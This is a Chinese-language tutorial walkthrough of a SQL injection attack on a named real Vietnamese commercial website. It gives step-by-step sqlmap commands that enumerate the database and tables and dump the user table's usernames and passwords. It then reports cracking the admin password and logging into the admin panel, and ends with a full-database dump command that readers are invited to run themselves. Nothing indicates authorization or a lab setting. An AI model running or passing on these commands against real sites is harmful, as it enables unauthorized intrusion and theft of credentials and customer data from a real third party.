实战:sqlmap注入特殊网址
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
1.目标网站:
http://vietnhatpro.vn/
2.注入点:
这里可以自己找
http://vietnhatpro.vn/index.php/mod,product/task,view/id,20/
可以看到 他的url有点不一样,我们常识把他变成动态的
访问
http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200
发现可以,和上面的地址等效,开始注入
3. 检测注入
sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 –tables
发现可以注入,而且是mysql
但是发现开始接收 information 的那个没用的数据库,太浪费时间所以先关掉
4.列出数据库
sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 –dbs
发现最后一行出现了有用的数据库 vietnhat_db
5. 指定数据库,开始找表
sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 -D vietnhat_db –tables
开始接收表啦,马上就要成功了
Database: vietnhat_db [43 tables]
+-------------------------+
| user |
| admin_menu |
| lang |
| tbl_action |
| tbl_advert |
| tbl_attribute |
| tbl_contact |
| tbl_download |
| tbl_group_attribute |
| tbl_member |
| tbl_module_roll |
| tbl_news |
| tbl_nguoiban |
| tbl_partner |
| tbl_photo |
| tbl_product_attribute |
| tbl_product_attribute2 |
| tbl_productor |
| tbl_project |
| tbl_project_options |
| tbl_roll |
| tbl_service |
| tbl_shopping_cart |
| tbl_slideshow |
| tbl_user_online |
| tbl_usertype_moduleroll |
| tbl_warranty |
| tblabout |
| tblbanner |
| tblcomment |
| tblgroup |
| tblkhachhang |
| tblnguoiban |
| tblpartner |
| tblpoll |
| tblproduct |
| tblsupport |
| tblsystem |
| tblthongtin |
| tblusergroup |
| tblusergroup_moduleroll |
| tblvote |
| user_type |
这个就是数据库里面的表,我找到了user表,感觉里面可能有 管理员
6. 指定表,开始查找列
sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 -D vietnhat_db -T user –columns
这里发现了 id,password, username 之后就没有必要继续下去了,我先关闭
7.开始查找内容
sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 -D vietnhat_db -T user
-C id,username,password --dump
成功找到 admin
开始破解密码
成功找到密码
8. 开始寻找后台
尝试 http://vietnhatpro.vn/admin.php发现失败了尝试 http://vietnhatpro.vn/admin成功找到
登陆之后
发现全都不认识。。。。。。
但是发现最下面有个系统config 可以切换成英语。。。
在这里我就关闭了
9. 开始脱裤
sqlmap -u http://vietnhatpro.vn/index.php/mod,product/task,view/?id=200 -D vietnhat_db –dump-all
有兴趣的自己去脱裤去吧、
再见